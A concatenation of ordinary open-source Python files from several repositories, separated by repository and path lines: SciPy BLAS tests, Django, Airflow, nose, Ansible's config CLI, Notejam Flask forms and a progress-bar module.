for f in _get_func('symm', 'zc'):
# NB: a is symmetric w/upper diag of ONLY
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([1, -1]))
def test_hemm_zc(self):
for f in _get_func('hemm', 'zc'):
# NB: a is hermitian w/upper diag of ONLY
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([1, 1]))
def test_syrk_zr(self):
for f in _get_func('syrk', 'zc'):
res = f(a=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([-1, -1]))
def test_herk_zr(self):
for f in _get_func('herk', 'zc'):
res = f(a=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), np.diag([1, 1]))
def test_syr2k_zr(self):
for f in _get_func('syr2k', 'zc'):
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), 2.*np.diag([-1, -1]))
def test_her2k_zr(self):
for f in _get_func('her2k', 'zc'):
res = f(a=self.sigma_y, b=self.sigma_y, alpha=1.)
assert_array_almost_equal(np.triu(res), 2.*np.diag([1, 1]))
class TestTRMM(object):
"""Quick and simple tests for dtrmm."""
def setup_method(self):
self.a = np.array([[1., 2., ],
[-2., 1.]])
self.b = np.array([[3., 4., -1.],
[5., 6., -2.]])
def test_ab(self):
f = getattr(fblas, 'dtrmm', None)
if f is not None:
result = f(1., self.a, self.b)
# default a is upper triangular
expected = np.array([[13., 16., -5.],
[5., 6., -2.]])
assert_array_almost_equal(result, expected)
def test_ab_lower(self):
f = getattr(fblas, 'dtrmm', None)
if f is not None:
result = f(1., self.a, self.b, lower=True)
expected = np.array([[3., 4., -1.],
[-1., -2., 0.]]) # now a is lower triangular
assert_array_almost_equal(result, expected)
def test_b_overwrites(self):
# BLAS dtrmm modifies B argument in-place.
# Here the default is to copy, but this can be overridden
f = getattr(fblas, 'dtrmm', None)
if f is not None:
for overwr in [True, False]:
bcopy = self.b.copy()
result = f(1., self.a, bcopy, overwrite_b=overwr)
# C-contiguous arrays are copied
assert_(bcopy.flags.f_contiguous is False and
np.may_share_memory(bcopy, result) is False)
assert_equal(bcopy, self.b)
bcopy = np.asfortranarray(self.b.copy()) # or just transpose it
result = f(1., self.a, bcopy, overwrite_b=True)
assert_(bcopy.flags.f_contiguous is True and
np.may_share_memory(bcopy, result) is True)
assert_array_almost_equal(bcopy, result)
def test_trsm():
seed(1234)
for ind, dtype in enumerate(DTYPES):
tol = np.finfo(dtype).eps*1000
func, = get_blas_funcs(('trsm',), dtype=dtype)
# Test protection against size mismatches
A = rand(4, 5).astype(dtype)
B = rand(4, 4).astype(dtype)
alpha = dtype(1)
assert_raises(Exception, func, alpha, A, B)
assert_raises(Exception, func, alpha, A.T, B)
n = 8
m = 7
alpha = dtype(-2.5)
A = (rand(m, m) if ind < 2 else rand(m, m) + rand(m, m)*1j) + eye(m)
A = A.astype(dtype)
Au = triu(A)
Al = tril(A)
B1 = rand(m, n).astype(dtype)
B2 = rand(n, m).astype(dtype)
x1 = func(alpha=alpha, a=A, b=B1)
assert_equal(B1.shape, x1.shape)
x2 = solve(Au, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B1, trans_a=1)
x2 = solve(Au.T, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B1, trans_a=2)
x2 = solve(Au.conj().T, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B1, diag=1)
Au[arange(m), arange(m)] = dtype(1)
x2 = solve(Au, alpha*B1)
assert_allclose(x1, x2, atol=tol)
x1 = func(alpha=alpha, a=A, b=B2, diag=1, side=1)
x2 = solve(Au.conj().T, alpha*B2.conj().T)
assert_allclose(x1, x2.conj().T, atol=tol)
x1 = func(alpha=alpha, a=A, b=B2, diag=1, side=1, lower=1)
Al[arange(m), arange(m)] = dtype(1)
x2 = solve(Al.conj().T, alpha*B2.conj().T)
assert_allclose(x1, x2.conj().T, atol=tol)
|
ManoSeimas/mp-design
|
refs/heads/master
|
manage.py
|
1
|
#!/usr/bin/env python
"""Django management entry point for the ``mp_design`` project."""
import os
import sys

if __name__ == "__main__":
    # Fall back to the project settings unless the environment already
    # chose a settings module.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mp_design.settings")

    # Imported lazily so DJANGO_SETTINGS_MODULE is set beforehand.
    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)
|
JTarball/docker-django-polymer-starter-kit
|
refs/heads/master
|
docker/app/app/backend/apps/_archive/stats/utils.py
|
4
|
from datetime import datetime, timedelta
from redis import Redis
import subprocess
import time
import logging # import the logging library
# Get an instance of a logger
logger = logging.getLogger(__name__)
# Initialise Redis server
r_server = Redis()
def load_redis_db(filename):
    """Load a Redis RDB snapshot and start a secondary server over it.

    Copies ``filename`` to ``./temp.rdb`` (the dump file referenced by
    ``redis_secondary.conf`` — TODO confirm against that config) and then
    launches ``./redis-server`` with that configuration.

    :param filename: path to the ``.rdb`` snapshot to load.
    :raises OSError: if the snapshot cannot be copied.
    :raises subprocess.CalledProcessError: if redis-server exits non-zero.

    NOTE(review): the original implementation shelled out to ``cp`` and
    ignored every return code, so all failures were silent.
    """
    import shutil

    dest_rdb = "./temp.rdb"
    conf = "./redis_secondary.conf"
    # Copy in-process instead of spawning `cp`; raises on failure.
    shutil.copyfile(filename, dest_rdb)
    # check_call surfaces a non-zero exit status instead of swallowing it.
    subprocess.check_call(["./redis-server", conf])
    # To connect, use a StrictRedis client pointed at the secondary server.
|
gkarlin/django-jenkins
|
refs/heads/master
|
build/Django/django/contrib/gis/geos/polygon.py
|
219
|
from ctypes import c_uint, byref
from django.contrib.gis.geos.geometry import GEOSGeometry
from django.contrib.gis.geos.libgeos import get_pointer_arr, GEOM_PTR
from django.contrib.gis.geos.linestring import LinearRing
from django.contrib.gis.geos import prototypes as capi
from django.utils import six
from django.utils.six.moves import xrange
class Polygon(GEOSGeometry):
_minlength = 1
    def __init__(self, *args, **kwargs):
        """
        Initializes on an exterior ring and a sequence of holes (both
        instances may be either LinearRing instances, or a tuple/list
        that may be constructed into a LinearRing).

        Examples of initialization, where shell, hole1, and hole2 are
        valid LinearRing geometries:
        >>> poly = Polygon(shell, hole1, hole2)
        >>> poly = Polygon(shell, (hole1, hole2))

        Example where a tuple parameters are used:
        >>> poly = Polygon(((0, 0), (0, 10), (10, 10), (0, 10), (0, 0)),
                           ((4, 4), (4, 6), (6, 6), (6, 4), (4, 4)))

        :raises TypeError: if no arguments are given.
        """
        if not args:
            raise TypeError('Must provide at least one LinearRing, or a tuple, to initialize a Polygon.')
        # Getting the ext_ring and init_holes parameters from the argument list
        ext_ring = args[0]
        init_holes = args[1:]
        n_holes = len(init_holes)
        # If initialized as Polygon(shell, (LinearRing, LinearRing)) [for backward-compatibility]
        # An empty inner sequence means "no holes"; a sequence whose first
        # element is a LinearRing is unwrapped into individual hole args.
        if n_holes == 1 and isinstance(init_holes[0], (tuple, list)):
            if len(init_holes[0]) == 0:
                init_holes = ()
                n_holes = 0
            elif isinstance(init_holes[0][0], LinearRing):
                init_holes = init_holes[0]
                n_holes = len(init_holes)
        # length = shell + holes; _create_polygon builds the GEOS geometry.
        polygon = self._create_polygon(n_holes + 1, (ext_ring,) + init_holes)
        super(Polygon, self).__init__(polygon, **kwargs)
def __iter__(self):
"Iterates over each ring in the polygon."
for i in xrange(len(self)):
yield self[i]
def __len__(self):
"Returns the number of rings in this Polygon."
return self.num_interior_rings + 1
@classmethod
def from_bbox(cls, bbox):
"Constructs a Polygon from a bounding box (4-tuple)."
x0, y0, x1, y1 = bbox
for z in bbox:
if not isinstance(z, six.integer_types + (float,)):
return GEOSGeometry('POLYGON((%s %s, %s %s, %s %s, %s %s, %s %s))' %
(x0, y0, x0, y1, x1, y1, x1, y0, x0, y0))
return Polygon(((x0, y0), (x0, y1), (x1, y1), (x1, y0), (x0, y0)))
### These routines are needed for list-like operation w/ListMixin ###
def _create_polygon(self, length, items):
# Instantiate LinearRing objects if necessary, but don't clone them yet
# _construct_ring will throw a TypeError if a parameter isn't a valid ring
# If we cloned the pointers here, we wouldn't be able to clean up
# in case of error.
rings = []
for r in items:
if isinstance(r, GEOM_PTR):
rings.append(r)
else:
rings.append(self._construct_ring(r))
shell = self._clone(rings.pop(0))
n_holes = length - 1
if n_holes:
holes = get_pointer_arr(n_holes)
for i, r in enumerate(rings):
holes[i] = self._clone(r)
holes_param = byref(holes)
else:
holes_param = None
return capi.create_polygon(shell, holes_param, c_uint(n_holes))
def _clone(self, g):
if isinstance(g, GEOM_PTR):
return capi.geom_clone(g)
else:
return capi.geom_clone(g.ptr)
def _construct_ring(self, param, msg='Parameter must be a sequence of LinearRings or objects that can initialize to LinearRings'):
"Helper routine for trying to construct a ring from the given parameter."
if isinstance(param, LinearRing): return param
try:
ring = LinearRing(param)
return ring
except TypeError:
raise TypeError(msg)
def _set_list(self, length, items):
# Getting the current pointer, replacing with the newly constructed
# geometry, and destroying the old geometry.
prev_ptr = self.ptr
srid = self.srid
self.ptr = self._create_polygon(length, items)
if srid: self.srid = srid
capi.destroy_geom(prev_ptr)
def _get_single_internal(self, index):
"""
Returns the ring at the specified index. The first index, 0, will
always return the exterior ring. Indices > 0 will return the
interior ring at the given index (e.g., poly[1] and poly[2] would
return the first and second interior ring, respectively).
CAREFUL: Internal/External are not the same as Interior/Exterior!
_get_single_internal returns a pointer from the existing geometries for use
internally by the object's methods. _get_single_external returns a clone
of the same geometry for use by external code.
"""
if index == 0:
return capi.get_extring(self.ptr)
else:
# Getting the interior ring, have to subtract 1 from the index.
return capi.get_intring(self.ptr, index-1)
def _get_single_external(self, index):
return GEOSGeometry(capi.geom_clone(self._get_single_internal(index)), srid=self.srid)
_set_single = GEOSGeometry._set_single_rebuild
_assign_extended_slice = GEOSGeometry._assign_extended_slice_rebuild
#### Polygon Properties ####
@property
def num_interior_rings(self):
"Returns the number of interior rings."
# Getting the number of rings
return capi.get_nrings(self.ptr)
def _get_ext_ring(self):
"Gets the exterior ring of the Polygon."
return self[0]
def _set_ext_ring(self, ring):
"Sets the exterior ring of the Polygon."
self[0] = ring
# Properties for the exterior ring/shell.
exterior_ring = property(_get_ext_ring, _set_ext_ring)
shell = exterior_ring
@property
def tuple(self):
"Gets the tuple for each ring in this Polygon."
return tuple([self[i].tuple for i in xrange(len(self))])
coords = tuple
@property
def kml(self):
"Returns the KML representation of this Polygon."
inner_kml = ''.join(["<innerBoundaryIs>%s</innerBoundaryIs>" % self[i+1].kml
for i in xrange(self.num_interior_rings)])
return "<Polygon><outerBoundaryIs>%s</outerBoundaryIs>%s</Polygon>" % (self[0].kml, inner_kml)
|
abenzbiria/clients_odoo
|
refs/heads/master
|
addons/website/tests/__init__.py
|
396
|
# -*- coding: utf-8 -*-
import test_converter
import test_crawl
import test_ui
import test_views
|
sekikn/incubator-airflow
|
refs/heads/master
|
tests/test_utils/config.py
|
8
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import contextlib
import os
from airflow import settings
from airflow.configuration import conf
@contextlib.contextmanager
def conf_vars(overrides):
    """Temporarily override Airflow config options (popping shadowing env vars)."""
    saved_options = {}
    saved_env = {}

    def _apply(section, key, value):
        # A value of None means "remove the option", not "set it to None".
        if value is not None:
            conf.set(section, key, value)
        else:
            conf.remove_option(section, key)

    for (section, key), new_value in overrides.items():
        env_name = conf._env_var_name(section, key)
        if env_name in os.environ:
            saved_env[env_name] = os.environ.pop(env_name)
        saved_options[(section, key)] = (
            conf.get(section, key) if conf.has_option(section, key) else None
        )
        _apply(section, key, new_value)
    settings.configure_vars()
    try:
        yield
    finally:
        # Restore the previous option values and environment, then re-derive
        # the settings that depend on them.
        for (section, key), old_value in saved_options.items():
            _apply(section, key, old_value)
        for env_name, old_value in saved_env.items():
            os.environ[env_name] = old_value
        settings.configure_vars()
@contextlib.contextmanager
def env_vars(overrides):
    """Temporarily set config-override environment variables."""
    replaced = {}      # vars that existed before and were overwritten
    introduced = []    # vars created from scratch
    for (section, key), value in overrides.items():
        env_name = conf._env_var_name(section, key)
        if env_name in os.environ:
            replaced[env_name] = os.environ.pop(env_name, '')
        else:
            introduced.append(env_name)
        os.environ[env_name] = value
    try:
        yield
    finally:
        for env_name, previous in replaced.items():
            os.environ[env_name] = previous
        for env_name in introduced:
            os.environ.pop(env_name)
|
axbaretto/beam
|
refs/heads/master
|
sdks/python/.eggs/nose-1.3.7-py2.7.egg/nose/result.py
|
68
|
"""
Test Result
-----------
Provides a TextTestResult that extends unittest's _TextTestResult to
provide support for error classes (such as the builtin skip and
deprecated classes), and hooks for plugins to take over or extend
reporting.
"""
import logging
try:
# 2.7+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
from nose.config import Config
from nose.util import isclass, ln as _ln # backwards compat
log = logging.getLogger('nose.result')
def _exception_detail(exc):
# this is what stdlib module traceback does
try:
return str(exc)
except:
return '<unprintable %s object>' % type(exc).__name__
class TextTestResult(_TextTestResult):
    """Text test result that extends unittest's default test result
    support for a configurable set of errorClasses (eg, Skip,
    Deprecated, TODO) that extend the errors/failures/success triad.
    """
    def __init__(self, stream, descriptions, verbosity, config=None,
                 errorClasses=None):
        # errorClasses maps exception class -> (storage list, label, isfail),
        # where isfail says whether a hit should fail the run.
        if errorClasses is None:
            errorClasses = {}
        self.errorClasses = errorClasses
        if config is None:
            config = Config()
        self.config = config
        _TextTestResult.__init__(self, stream, descriptions, verbosity)

    def addSkip(self, test, reason):
        # 2.7 skip compat
        from nose.plugins.skip import SkipTest
        if SkipTest in self.errorClasses:
            storage, label, isfail = self.errorClasses[SkipTest]
            storage.append((test, reason))
            self.printLabel(label, (SkipTest, reason, None))

    def addError(self, test, err):
        """Overrides normal addError to add support for
        errorClasses. If the exception is a registered class, the
        error will be added to the list for that class, not errors.
        """
        ec, ev, tb = err
        try:
            exc_info = self._exc_info_to_string(err, test)
        except TypeError:
            # 2.3 compat
            exc_info = self._exc_info_to_string(err)
        for cls, (storage, label, isfail) in self.errorClasses.items():
            #if 'Skip' in cls.__name__ or 'Skip' in ec.__name__:
            #    from nose.tools import set_trace
            #    set_trace()
            if isclass(ec) and issubclass(ec, cls):
                if isfail:
                    test.passed = False
                storage.append((test, exc_info))
                self.printLabel(label, err)
                return
        # Not a registered error class: record as a plain error.
        self.errors.append((test, exc_info))
        test.passed = False
        self.printLabel('ERROR')

    # override to bypass changes in 2.7
    def getDescription(self, test):
        if self.descriptions:
            return test.shortDescription() or str(test)
        else:
            return str(test)

    def printLabel(self, label, err=None):
        # Might get patched into a streamless result
        stream = getattr(self, 'stream', None)
        if stream is not None:
            if self.showAll:
                message = [label]
                if err:
                    detail = _exception_detail(err[1])
                    if detail:
                        message.append(detail)
                stream.writeln(": ".join(message))
            elif self.dots:
                # Dot mode: print just the first character of the label.
                stream.write(label[:1])

    def printErrors(self):
        """Overrides to print all errorClasses errors as well.
        """
        _TextTestResult.printErrors(self)
        for cls in self.errorClasses.keys():
            storage, label, isfail = self.errorClasses[cls]
            if isfail:
                self.printErrorList(label, storage)
        # Might get patched into a result with no config
        if hasattr(self, 'config'):
            self.config.plugins.report(self.stream)

    def printSummary(self, start, stop):
        """Called by the test runner to print the final summary of test
        run results.
        """
        write = self.stream.write
        writeln = self.stream.writeln
        taken = float(stop - start)
        run = self.testsRun
        plural = run != 1 and "s" or ""

        writeln(self.separator2)
        writeln("Ran %s test%s in %.3fs" % (run, plural, taken))
        writeln()

        # Count per-label hits from error classes plus the standard
        # failures/errors buckets.
        summary = {}
        # NOTE: Python 2 — keys()/items() return lists (items.sort() below).
        eckeys = self.errorClasses.keys()
        for cls in eckeys:
            storage, label, isfail = self.errorClasses[cls]
            count = len(storage)
            if not count:
                continue
            summary[label] = count
        if len(self.failures):
            summary['failures'] = len(self.failures)
        if len(self.errors):
            summary['errors'] = len(self.errors)

        if not self.wasSuccessful():
            write("FAILED")
        else:
            write("OK")
        items = summary.items()
        if items:
            items.sort()
            write(" (")
            write(", ".join(["%s=%s" % (label, count) for
                             label, count in items]))
            writeln(")")
        else:
            writeln()

    def wasSuccessful(self):
        """Overrides to check that there are no errors in errorClasses
        lists that are marked as errors and should cause a run to
        fail.
        """
        if self.errors or self.failures:
            return False
        for cls in self.errorClasses.keys():
            storage, label, isfail = self.errorClasses[cls]
            if not isfail:
                continue
            if storage:
                return False
        return True

    def _addError(self, test, err):
        # Minimal error recorder used when bypassing the errorClasses logic.
        try:
            exc_info = self._exc_info_to_string(err, test)
        except TypeError:
            # 2.3: does not take test arg
            exc_info = self._exc_info_to_string(err)
        self.errors.append((test, exc_info))
        if self.showAll:
            self.stream.write('ERROR')
        elif self.dots:
            self.stream.write('E')

    def _exc_info_to_string(self, err, test=None):
        # 2.7 skip compat
        from nose.plugins.skip import SkipTest
        if isclass(err[0]) and issubclass(err[0], SkipTest):
            return str(err[1])
        # 2.3/2.4 -- 2.4 passes test, 2.3 does not
        try:
            return _TextTestResult._exc_info_to_string(self, err, test)
        except TypeError:
            # 2.3: does not take test arg
            return _TextTestResult._exc_info_to_string(self, err)
def ln(*args, **kwargs):
    """Deprecated alias for nose.util.ln; warns, then delegates."""
    from warnings import warn
    message = ("ln() has moved to nose.util from nose.result and will be removed "
               "from nose.result in a future release. Please update your imports ")
    warn(message, DeprecationWarning)
    return _ln(*args, **kwargs)
|
tonk/ansible
|
refs/heads/devel
|
lib/ansible/cli/config.py
|
47
|
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import shlex
import subprocess
import yaml
from ansible import context
from ansible.cli import CLI
from ansible.cli.arguments import option_helpers as opt_help
from ansible.config.manager import ConfigManager, Setting, find_ini_config_file
from ansible.errors import AnsibleError, AnsibleOptionsError
from ansible.module_utils._text import to_native, to_text, to_bytes
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.utils.color import stringc
from ansible.utils.display import Display
from ansible.utils.path import unfrackpath
display = Display()
class ConfigCLI(CLI):
    """ Config command line class """

    def __init__(self, args, callback=None):
        # Resolved lazily in run(): path of the active ansible.cfg and the
        # ConfigManager built from it.
        self.config_file = None
        self.config = None
        super(ConfigCLI, self).__init__(args, callback)

    def init_parser(self):
        # Build the `ansible-config` argument parser with one subcommand per
        # execute_* method (list / dump / view).
        super(ConfigCLI, self).init_parser(
            desc="View ansible configuration.",
        )

        # Options shared by every subcommand.
        common = opt_help.argparse.ArgumentParser(add_help=False)
        opt_help.add_verbosity_options(common)
        common.add_argument('-c', '--config', dest='config_file',
                            help="path to configuration file, defaults to first file found in precedence.")

        subparsers = self.parser.add_subparsers(dest='action')
        subparsers.required = True

        list_parser = subparsers.add_parser('list', help='Print all config options', parents=[common])
        list_parser.set_defaults(func=self.execute_list)

        dump_parser = subparsers.add_parser('dump', help='Dump configuration', parents=[common])
        dump_parser.set_defaults(func=self.execute_dump)
        dump_parser.add_argument('--only-changed', dest='only_changed', action='store_true',
                                 help="Only show configurations that have changed from the default")

        view_parser = subparsers.add_parser('view', help='View configuration file', parents=[common])
        view_parser.set_defaults(func=self.execute_view)

        # Subcommands not implemented yet (see execute_update/execute_edit):
        # update_parser = subparsers.add_parser('update', help='Update configuration option')
        # update_parser.set_defaults(func=self.execute_update)
        # update_parser.add_argument('-s', '--setting', dest='setting',
        #                            help="config setting, the section defaults to 'defaults'",
        #                            metavar='[section.]setting=value')
        # search_parser = subparsers.add_parser('search', help='Search configuration')
        # search_parser.set_defaults(func=self.execute_search)
        # search_parser.add_argument('args', help='Search term', metavar='<search term>')

    def post_process_args(self, options):
        options = super(ConfigCLI, self).post_process_args(options)
        display.verbosity = options.verbosity
        return options

    def run(self):
        # Resolve the config file (explicit -c beats the lookup precedence),
        # then dispatch to the subcommand's execute_* function.
        super(ConfigCLI, self).run()

        if context.CLIARGS['config_file']:
            self.config_file = unfrackpath(context.CLIARGS['config_file'], follow=False)
            b_config = to_bytes(self.config_file)
            if os.path.exists(b_config) and os.access(b_config, os.R_OK):
                self.config = ConfigManager(self.config_file)
            else:
                raise AnsibleOptionsError('The provided configuration file is missing or not accessible: %s' % to_native(self.config_file))
        else:
            self.config = ConfigManager()
            self.config_file = find_ini_config_file()

            if self.config_file:
                try:
                    if not os.path.exists(self.config_file):
                        raise AnsibleOptionsError("%s does not exist or is not accessible" % (self.config_file))
                    elif not os.path.isfile(self.config_file):
                        raise AnsibleOptionsError("%s is not a valid file" % (self.config_file))

                    os.environ['ANSIBLE_CONFIG'] = to_native(self.config_file)
                except Exception:
                    # Only `view` strictly needs a readable file; other
                    # actions continue with an empty configuration.
                    if context.CLIARGS['action'] in ['view']:
                        raise
                    elif context.CLIARGS['action'] in ['edit', 'update']:
                        display.warning("File does not exist, used empty file: %s" % self.config_file)

            elif context.CLIARGS['action'] == 'view':
                raise AnsibleError('Invalid or no config file was supplied')

        context.CLIARGS['func']()

    def execute_update(self):
        '''
        Updates a single setting in the specified ansible.cfg
        '''
        raise AnsibleError("Option not implemented yet")

        # pylint: disable=unreachable
        if context.CLIARGS['setting'] is None:
            raise AnsibleOptionsError("update option requires a setting to update")

        (entry, value) = context.CLIARGS['setting'].split('=')
        if '.' in entry:
            (section, option) = entry.split('.')
        else:
            section = 'defaults'
            option = entry
        # Delegates the actual edit to the ini_file module against localhost.
        subprocess.call([
            'ansible',
            '-m', 'ini_file',
            'localhost',
            '-c', 'local',
            '-a', '"dest=%s section=%s option=%s value=%s backup=yes"' % (self.config_file, section, option, value)
        ])

    def execute_view(self):
        '''
        Displays the current config file
        '''
        try:
            with open(self.config_file, 'rb') as f:
                self.pager(to_text(f.read(), errors='surrogate_or_strict'))
        except Exception as e:
            raise AnsibleError("Failed to open config file: %s" % to_native(e))

    def execute_edit(self):
        '''
        Opens ansible.cfg in the default EDITOR
        '''
        raise AnsibleError("Option not implemented yet")

        # pylint: disable=unreachable
        try:
            editor = shlex.split(os.environ.get('EDITOR', 'vi'))
            editor.append(self.config_file)
            subprocess.call(editor)
        except Exception as e:
            raise AnsibleError("Failed to open editor: %s" % to_native(e))

    def execute_list(self):
        '''
        list all current configs reading lib/constants.py and shows env and config file setting names
        '''
        self.pager(to_text(yaml.dump(self.config.get_configuration_definitions(), Dumper=AnsibleDumper), errors='surrogate_or_strict'))

    def execute_dump(self):
        '''
        Shows the current settings, merges ansible.cfg if specified
        '''
        # FIXME: deal with plugins, not just base config
        text = []
        # Start from the definitions, then overlay any explicitly-set values.
        defaults = self.config.get_configuration_definitions().copy()
        for setting in self.config.data.get_settings():
            if setting.name in defaults:
                defaults[setting.name] = setting

        for setting in sorted(defaults):
            if isinstance(defaults[setting], Setting):
                # yellow = changed from the default, green = still default.
                if defaults[setting].origin == 'default':
                    color = 'green'
                else:
                    color = 'yellow'
                msg = "%s(%s) = %s" % (setting, defaults[setting].origin, defaults[setting].value)
            else:
                color = 'green'
                msg = "%s(%s) = %s" % (setting, 'default', defaults[setting].get('default'))
            if not context.CLIARGS['only_changed'] or color == 'yellow':
                text.append(stringc(msg, color))

        self.pager(to_text('\n'.join(text), errors='surrogate_or_strict'))
|
lefloh/notejam
|
refs/heads/master
|
flask/notejam/forms.py
|
6
|
from flask.ext.wtf import (Form, TextField, PasswordField,
SelectField, TextAreaField)
from flask.ext.wtf import Required, Email, EqualTo, ValidationError
from notejam.models import User, Pad
class SigninForm(Form):
    """Credentials form for logging an existing user in."""
    email = TextField('Email', validators=[Required(), Email()])
    password = PasswordField('Password', validators=[Required()])
class SignupForm(Form):
    """Registration form; rejects emails that are already registered."""
    email = TextField('Email', validators=[Required(), Email()])
    password = PasswordField('Password', validators=[Required()])
    repeat_password = PasswordField(
        'Repeat Password',
        validators=[
            Required(), EqualTo(
                'password', message="Your passwords do not match"
            )
        ]
    )

    def validate_email(self, field):
        # WTForms convention: validate_<fieldname> runs as an inline validator.
        if User.query.filter_by(email=field.data).count():
            raise ValidationError(
                'User with this email is already signed up'
            )
class NoteForm(Form):
    """Create/edit form for a note; pad choices are limited to the user's pads."""
    name = TextField('Name', validators=[Required()])
    text = TextAreaField('Note', validators=[Required()])
    pad = SelectField('Pad', choices=[], coerce=int)

    # @TODO use wtforms.ext.sqlalchemy.fields.QuerySelectField?
    def __init__(self, user=None, **kwargs):
        super(NoteForm, self).__init__(**kwargs)
        # First choice (id 0) represents "no pad selected".
        self.pad.choices = [(0, '---------')] + [
            (p.id, p.name) for p in Pad.query.filter_by(user=user)
        ]
class PadForm(Form):
    """Create/edit form for a pad."""
    name = TextField('Name', validators=[Required()])
# dummy form
class DeleteForm(Form):
    # Empty placeholder form for delete submissions (presumably so deletes go
    # through a validated POST/CSRF check — confirm against the views).
    pass
class ChangePasswordForm(Form):
    """Password-change form; verifies the old password against the given user.

    The user is accepted as an explicit ``user=`` argument (mirroring
    NoteForm) and is kept out of the kwargs forwarded to Form, so it is not
    misinterpreted as field data.
    """
    old_password = PasswordField('Old Password', validators=[Required()])
    new_password = PasswordField('New Password', validators=[Required()])
    repeat_new_password = PasswordField(
        'Repeat New Password',
        validators=[
            Required(), EqualTo(
                'new_password', message="Your passwords don't match"
            )
        ]
    )

    def __init__(self, user=None, **kwargs):
        super(ChangePasswordForm, self).__init__(**kwargs)
        # Backward compatible: previously the user was read from
        # kwargs['user'] (raising KeyError when absent) — keep that behavior
        # when no explicit argument is given.
        self.user = user if user is not None else kwargs['user']

    def validate_old_password(self, field):
        # Inline WTForms validator for the old_password field.
        if not self.user.check_password(field.data):
            raise ValidationError(
                'Incorrect old password'
            )
class ForgotPasswordForm(Form):
    """Password-reset request form; requires an email of a known user."""
    email = TextField('Email', validators=[Required(), Email()])

    def validate_email(self, field):
        if not User.query.filter_by(email=field.data).count():
            raise ValidationError(
                'No user with given email found'
            )
|
EiSandi/greetingslack
|
refs/heads/master
|
greetingslack/lib/python2.7/site-packages/pip/_vendor/progress/__init__.py
|
916
|
# Copyright (c) 2012 Giorgos Verigakis <verigak@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from __future__ import division
from collections import deque
from datetime import timedelta
from math import ceil
from sys import stderr
from time import time
__version__ = '1.2'
class Infinite(object):
    """Endless progress indicator: counts iterations and keeps a simple
    moving average of per-item duration over the last `sma_window` steps.
    """

    file = stderr        # stream subclasses render to
    sma_window = 10      # how many recent per-item durations to average

    def __init__(self, *args, **kwargs):
        self.index = 0
        self.start_ts = time()
        self._ts = self.start_ts
        self._dt = deque(maxlen=self.sma_window)
        # Every keyword argument becomes an attribute (e.g. message=, max=).
        for name, value in kwargs.items():
            setattr(self, name, value)

    def __getitem__(self, key):
        # Template-style attribute access; private names are hidden.
        return None if key.startswith('_') else getattr(self, key, None)

    @property
    def avg(self):
        """Moving average of seconds per item (0 before the first step)."""
        if not self._dt:
            return 0
        return sum(self._dt) / len(self._dt)

    @property
    def elapsed(self):
        """Whole seconds since construction."""
        return int(time() - self.start_ts)

    @property
    def elapsed_td(self):
        return timedelta(seconds=self.elapsed)

    def update(self):
        """Hook: redraw the indicator. No-op in the base class."""
        pass

    def start(self):
        pass

    def finish(self):
        pass

    def next(self, n=1):
        """Advance the counter by `n`, recording the per-item duration."""
        if n > 0:
            now = time()
            self._dt.append((now - self._ts) / n)
            self._ts = now
        self.index += n
        self.update()

    def iter(self, it):
        """Yield from `it`, advancing the indicator once per item."""
        for item in it:
            yield item
            self.next()
        self.finish()
class Progress(Infinite):
    """Bounded indicator: adds completion ratio and ETA on top of Infinite."""

    def __init__(self, *args, **kwargs):
        super(Progress, self).__init__(*args, **kwargs)
        self.max = kwargs.get('max', 100)

    @property
    def eta(self):
        """Estimated whole seconds remaining, from the moving average."""
        return int(ceil(self.avg * self.remaining))

    @property
    def eta_td(self):
        return timedelta(seconds=self.eta)

    @property
    def percent(self):
        return self.progress * 100

    @property
    def progress(self):
        # Clamped at 1 in case the counter overshoots max.
        return min(1, self.index / self.max)

    @property
    def remaining(self):
        return max(self.max - self.index, 0)

    def start(self):
        self.update()

    def goto(self, index):
        """Jump directly to an absolute index."""
        self.next(index - self.index)

    def iter(self, it):
        """Yield from `it`; uses len(it) as max when it is sized."""
        try:
            self.max = len(it)
        except TypeError:
            pass
        for item in it:
            yield item
            self.next()
        self.finish()
|
erwilan/ansible
|
refs/heads/devel
|
